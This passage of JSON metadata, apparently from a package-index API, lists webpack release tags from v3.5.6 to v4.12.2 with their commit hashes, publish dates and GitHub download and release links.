/tar.gz/v4.12.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.12.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.12.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.12.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.12.2/manifests"},{"name":"v4.12.1","sha":"8a7597aa6eb2eef66a8f9db3a0c49bcb96022a94","kind":"tag","published_at":"2018-06-24T08:44:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.12.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.12.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.12.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.12.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.12.1/manifests"},{"name":"v4.12.0","sha":"02a955b4335cb7eeeb4dd1c96ef5407c6bcea158","kind":"tag","published_at":"2018-06-08T07:24:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.12.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.12.0/manifests"},{"name":"v4.11.1","sha":"956c0b12dcc274f5e5725fc5abc51f805d916f43","kind":"tag","published_at":"2018-06-06T07:02:56.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.11.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.11.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.11.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.11.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.11.1/manifests"},{"name":"v4.11.0","sha":"e2fe2009d9f2b26a8d751ea89e184d6ec96e37d7","kind":"tag","published_at":"2018-06-05T11:25:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.11.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.11.0/manifests"},{"name":"v4.10.2","sha":"b8266d09a9472344a4894f1d8cf4067eb452019c","kind":"tag","published_at":"2018-05-30T08:29:15.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.10.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.10.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.10.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.10.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.10.2/manifests"},{"name":"v4.10.1","sha":"b80296f0c8b3907a8c96e4146bfb21746346fbb0","kind":"tag","published_at":"2018-05-29T13:38:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.10.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.10.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.10.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.10.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.10.1/manifests"},{"name":"v4.10.0","sha":"ba703401d580ad623af17fe96ed98b4d801e0313","kind":"tag","published_at":"2018-05-28T23:12:50.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.10.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.10.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.10.0/manifests"},{"name":"v4.9.2","sha":"317fb353518179c50342b1ac826d393a85b5903e","kind":"tag","published_at":"2018-05-28T20:28:54.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.9.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.9.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.9.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.9.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.9.2/manifests"},{"name":"v4.9.1","sha":"94cd709b06ffc7071b3505a746f0bb17fb7e3c33","kind":"tag","published_at":"2018-05-25T21:30:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.9.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.9.1/manifests"},{"name":"v4.9.0","sha":"bb0731d7897fb8a7369efd9d2f9bf0a8c08d546d","kind":"tag","published_at":"2018-05-25T20:17:33.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.9.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.9.0/manifests"},{"name":"v4.8.3","sha":"9a72294918064d6b976538adf808808de948585f","kind":"tag","published_at":"2018-05-12T20:56:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.8.3","html_url":"https://github.com/webpack/webpack/releases/tag/v4.8.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.8.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.8.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.8.3/manifests"},{"name":"v4.8.2","sha":"c92eabd3be44d4162be0affc9ef368624b0a6e51","kind":"tag","published_at":"2018-05-11T16:13:07.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.8.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.8.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.8.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.8.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.8.2/manifests"},{"name":"v3.12.0","sha":"cce33c206abaeef26d06b62102adf74a989a4696","kind":"tag","published_at":"2018-05-11T14:50:45.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.12.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.12.0/manifests"},{"name":"v4.8.1","sha":"2986ab1a18e895ac3f2546ac0c70bf73c0fdb679","kind":"tag","published_at":"2018-05-07T21:03:09.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.8.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.8.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.8.1/manifests"},{"name":"v4.8.0","sha":"586f9a21768e8bbc6bead6e564a6c7981a42f2d8","kind":"tag","published_at":"2018-05-07T11:39:25.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.8.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.8.0/manifests"},{"name":"v4.7.0","sha":"673c103715b5439bf72ed9767f5189b92ce7d428","kind":"tag","published_at":"2018-05-04T11:57:48.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.7.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.7.0/manifests"},{"name":"v4.6.0","sha":"e7c8fa414b718ac98d94a96e2553faceabfbc92f","kind":"tag","published_at":"2018-04-17T16:23:38.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.6.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.6.0/manifests"},{"name":"v4.5.0","sha":"e400445445a2f91d19aa8c79aa7b34b66011e661","kind":"tag","published_at":"2018-04-04T13:07:39.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.5.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.5.0/manifests"},{"name":"v4.4.1","sha":"0e404b8683d79052e3a6b42743bd3061f17a5a5d","kind":"tag","published_at":"2018-03-29T15:28:58.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.4.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.4.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.4.1/manifests"},{"name":"v4.4.0","sha":"e3bb8c9c8f5a30884b4df01bfbbc772cc1fb8cda","kind":"tag","published_at":"2018-03-29T14:57:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.4.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.4.0/manifests"},{"name":"v4.3.0","sha":"54ceb3c04d513ef5c7b78eaf4d391d14cfbe8282","kind":"tag","published_at":"2018-03-27T09:00:21.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.3.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.3.0/manifests"},{"name":"v4.2.0","sha":"d668a23fdc69c61ab80ec8db89a5b49778559534","kind":"tag","published_at":"2018-03-21T08:26:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.2.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.2.0/manifests"},{"name":"v4.1.1","sha":"41bb63ad69d0f32c042e74e732cb045b5966c452","kind":"tag","published_at":"2018-03-07T15:37:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.1.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.1.1/manifests"},{"name":"v4.1.0","sha":"f916fc0bb70585cf04a92cd99e004e4879f1d337","kind":"tag","published_at":"2018-03-04T10:39:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.1.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.1.0/manifests"},{"name":"v4.0.1","sha":"5044762c846a3a83a208853e48785a293fe9ef7d","kind":"tag","published_at":"2018-02-26T20:11:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.1/manifests"},{"name":"v4.0.0","sha":"213226ece261a0e89edb9de15fbc6775418f6041","kind":"tag","published_at":"2018-02-25T02:37:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0/manifests"},{"name":"v4.0.0-beta.3","sha":"4c25bfbaf2e01cf23708a381319b43367701e5b5","kind":"tag","published_at":"2018-02-24T14:55:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.0-beta.3","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.0-beta.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.0-beta.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-beta.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-beta.3/manifests"},{"name":"v4.0.0-beta.2","sha":"2ad530e4b486c248758f6d9d94070f207ef5f2e9","kind":"tag","published_at":"2018-02-17T13:10:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.0-beta.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.0-beta.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.0-beta.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-beta.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-beta.2/manifests"},{"name":"v3.11.0","sha":"bc840ec8747ba19c9e87629f2959ed2e65a9ffbe","kind":"tag","published_at":"2018-02-10T14:37:11.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.11.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.11.0/manifests"},{"name":"v4.0.0-beta.1","sha":"df65475ba32a5881f48ab9d90e1c010ea57c3d65","kind":"tag","published_at":"2018-02-10T14:10:29.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.0-beta.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.0-beta.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.0-beta.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-beta.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-beta.1/manifests"},{"name":"v4.0.0-beta.0","sha":"ae0dc62b7b4cc1ee3170c8ce3dd581ddcfa46a2a","kind":"tag","published_at":"2018-01-24T22:25:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.0-beta.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.0-beta.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.0-beta.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-beta.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-beta.0/manifests"},{"name":"v4.0.0-alpha.5","sha":"c302bba6a53601dcab5e86dce5778897710c86e1","kind":"tag","published_at":"2018-01-22T14:19:25.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.0-alpha.5","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.0-alpha.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.0-alpha.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.5/manifests"},{"name":"v4.0.0-alpha.4","sha":"37cc6f4f6ec178d0406dcf816de690cab9b1bf8f","kind":"tag","published_at":"2018-01-06T09:46:40.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.0-alpha.4","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.0-alpha.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.0-alpha.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.4/manifests"},{"name":"v4.0.0-alpha.3","sha":"9334fd8547831ded7f11e05319616a72ea0b4698","kind":"tag","published_at":"2018-01-04T21:24:34.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.0-alpha.3","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.0-alpha.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.0-alpha.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.3/manifests"},{"name":"v4.0.0-alpha.2","sha":"910d6fd40996189ee990fe90c69ab732cbd9963a","kind":"tag","published_at":"2017-12-22T11:49:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.0-alpha.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.0-alpha.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.0-alpha.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.2/manifests"},{"name":"v4.0.0-alpha.1","sha":"9a33e031d16008d690a188a2d784666c8a293b43","kind":"tag","published_at":"2017-12-14T15:08:09.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.0-alpha.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.0-alpha.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.0-alpha.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.1/manifests"},{"name":"v4.0.0-alpha.0","sha":"fd3c8025e5c32e625f68df2b030646a8c2a8467a","kind":"tag","published_at":"2017-12-04T19:52:58.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.0-alpha.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.0-alpha.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.0-alpha.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.0/manifests"},{"name":"v3.10.0","sha":"c71fd05f98a752753b9450f590c970b76379803d","kind":"tag","published_at":"2017-12-04T18:02:49.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.10.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.10.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.10.0/manifests"},{"name":"v3.9.1","sha":"5acbe2f72eaa67654904cf8a127c3ed4da12dc99","kind":"tag","published_at":"2017-11-30T17:10:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.9.1","html_url":"https://github.com/webpack/webpack/releases/tag/v3.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.9.1/manifests"},{"name":"v3.9.0","sha":"73e34a7306d40ed95d666058ad03e9c14de554af","kind":"tag","published_at":"2017-11-30T13:53:37.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.9.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.9.0/manifests"},{"name":"v3.8.1","sha":"b8e6b4a100a5d5a6387c276eb52d6c7f20954a0b","kind":"tag","published_at":"2017-10-17T15:20:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.8.1","html_url":"https://github.com/webpack/webpack/releases/tag/v3.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.8.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.8.1/manifests"},{"name":"v3.8.0","sha":"1dc561865ad57d9e862832ccf3579f67a8bbba2d","kind":"tag","published_at":"2017-10-17T09:15:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.8.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.8.0/manifests"},{"name":"v3.7.1","sha":"ce24e98bc084bf45a271fb05b14b0e9829686149","kind":"tag","published_at":"2017-10-11T19:39:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.7.1","html_url":"https://github.com/webpack/webpack/releases/tag/v3.7.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.7.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.7.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.7.1/manifests"},{"name":"v3.7.0","sha":"551ea76838f163a1e0fbf65182e2ac08d346a1f3","kind":"tag","published_at":"2017-10-11T18:07:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.7.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.7.0/manifests"},{"name":"v3.6.0","sha":"622675993d72c6ea7d70cd2e503fd9416f940b2b","kind":"tag","published_at":"2017-09-15T08:45:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.6.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.6.0/manifests"},{"name":"v3.5.6","sha":"92d5c209437f9ef9293571e24cc8dcf10459d578","kind":"tag","published_at":"2017-09-06T15:41:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.5.6","html_url":"https://github.com/webpack/webpack/releases/tag/v3.5.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.5.6","tag_url":"https://repos.ecosy